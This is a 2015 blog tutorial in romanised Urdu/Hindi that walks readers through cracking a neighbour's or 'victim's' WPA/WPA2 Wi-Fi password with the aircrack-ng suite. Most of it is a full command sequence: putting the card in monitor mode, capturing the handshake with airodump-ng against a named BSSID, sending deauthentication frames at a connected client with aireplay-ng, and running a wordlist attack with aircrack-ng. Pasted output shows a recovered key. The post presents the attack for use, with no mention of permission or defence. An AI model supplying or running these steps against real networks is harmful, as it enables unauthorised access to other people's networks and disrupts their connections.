Sunday 28 June 2015

How Hack Wifi WPA WEP WPA2 With Aircrack-ng in URDU HINDI



 AIRCRACK PASSWORDLIST AIRMON-NG ATTACK ""IN URDU""
 HOW CAPTURE .cap FILE ""IN URDU""
 HOW CAPTURE WIFI HANDSHAKE .cap FILE  ""IN URDU""
 HOW MAKE PERFECT AIRCRACK ATTACK  ""IN URDU""

ASSALAMOALIKUM MERY PAKISTANI HACKERS AJJ HUM WIFI KO HACK KARNA SEKHENGY JIS KI DETAIL YEA HAN..
NOTE >>>> Commands Sirf Red Colour Mein Han..
Artical Wrire By : Muhammad Qutab BuTT

1>AIRCRACK PASSWORDLIST AIRMON-NG ATTACK ""IN URDU""
 2>HOW CAPTURE .cap FILE ""IN URDU""
 3>HOW CAPTURE WIFI HANDSHAKE .cap  FILE ""IN URDU""
                                            4>HOW MAKE PERFECT AIRCRACK ATTACK  ""IN URDU""
Sab sy pehly hum apny modem ka interface check karengy command hy
iwconfig
is ky bad ap ko wlan0 ky samny ap ka interface show ho jay ga jo mon0 athk waghera ho sakta hy
interface check karny ky bad ap command dyngy

airmon-ng
us ky bad next command
airmon-ng stop wlan0
es ky bad next command
airodump-ng wlan0
es ky bad ap ky pass ap ky wifi connections show ho jayngy with channel aor bssid info
es ky bad jab ap ky victim ka connection with info show ho jay to ap Ctrl plus Alt marengy to wo stop ho jay ga waheen us ky bad
apny victim ki info ap ky samny hy ab next terminal open karengy aor command dyngy kuch aysy

airodump-ng --bssid 00:07:26:32:CB:AB -c 1 --write youfilename wlan0mon
 
Sab sy pahly es command ko dyny ka maqsad smajhty han es command ki maddad sy hum apny victim ky wifi ki handshake
file capture karngy jis ki maddad sy hum apna next setp mukammal karengy to jaisa ky es command mein airodump-ng ky bad--bssid
ky samny humary victim ki bssid hy jo ky hum nay es sy pichly step mein hasil ki thius ky bad -c1 ka matlab yea hy ky humara victim
channel 1 py hy yea info bhi humien pichly step mein mil gai thi us ky bad --write ky bad handshake<< ""Yea zaroori hy "" file ka jo name rakhna hy ap ki marzi us ky bad wlan0 jo ky mera interface hy jo ky hum nay iwconfig command sy hasil ki thi..
es ky bad jasy hi hum es command ko hit karengy kuch aysy karky yahan process start ho jay ga


CH  9 ][ Elapsed: 0 s ][ 2015-06-28 08:35                                        
                                                                                           
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                           
 00:07:26:32:CB:AB  -93        5        0    0  11  54   WPA2 CCMP   PSK  unkwnon             
                                                                                           
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                 
                                                                                            
 (not associated)   9C:02:98:87:3E:E5  -88    0 - 1      0        3


ab jasy hi yea process start hoga to humien jaldi hi next command box open karna hy aor handshake ky liye aysy command deni hy jasy hi hum apni handshake command dyngy wahan upar es line ky last mein automatic Hand shake likha howa aa jay ga jasy hi hand shake lika aa jay to humien alt plus ctrl mar ky process ko stop karna parega hand shake ki command yea hy CH  9 ][ Elapsed: 0 s ][ 2015-06-28 08:35 yahan Hand shake likha ayy ga
aireplay-ng --deauth 100 -a 00:07:26:32:CB:AB -c 24:09:95:39:1E:00 wlan0
es command mein -a ky samny humary victim ki bssid hy aor -c ky samny humary victim ka station hy jo ky last wali lines mein atta hy airodump wali command ky..
ab jasy hi humari handshake file creat ho jay gi to humien last command kuch aysy deni hy


aircrack-ng output-01.cap -w /root/Desktop/realuniq.lst
es command mein hum nay apny victim ki handhake file ko select kiya and apni wordlist ko select kiya hy.meri wordlist Desktop py pari hy aor name realuniq hy ap ki wordlist ka name aor us ka folder change hoga.
meri hand shake file ka name output-01.cap hy aor word list desktop py hy jis ka name realuniq.lst
hy ap ki output file ka name aor
wordlist ka name aor path change ho sakti hy wo ap apny mutabik dyngy jasy hi ap yea command hit karengy to ap ky pas kuch aysy process chalny lag jay ga aor ap ka password nikal jay ga us ki timing diffrent hoti hy kisi ka 1 din lagta kisi ka 1 hour kabhi kabhi
3/4 din bhi  lag jaty han to jitni bari wordlist hogi utni hi deer lagay ga passwd crack karny mein
 


[42:04:42] 18703828 keys tested (197.16 k/s)


                       Key Found: 1218118501                


      Master Key     : 90 34 61 74 E3 D9 CB C1 3A 7B 1E CA A4 5A EF 8E
                       48 C8 46 30 AC 97 80 1E 91 01 FA 6A CC C4 42 F5

      Transient Key  : 8E 74 C9 7E 10 2B 44 CB 1D 50 96 F2 96 00 12 84
                       9A 5B 44 2F 26 C0 EE 57 B6 BA 60 E8 FE 31 8A B5
                       A6 13 99 CC AB 88 03 B4 02 15 7D 91 D9 F2 31 56
                       22 AF 00 2F 66 09 EB 4B F2 93 E5 86 7D EF 16 67

      EAPOL HMAC     : 6B 0A 43 6B C7 D3 A4 9C BD 85 FC C1 0C 4A 5B A1


Enjoy :D



Source By:  http://linux-commands-backtrack.blogspot.com/

Write By >> @Muhammad QuTab BuTT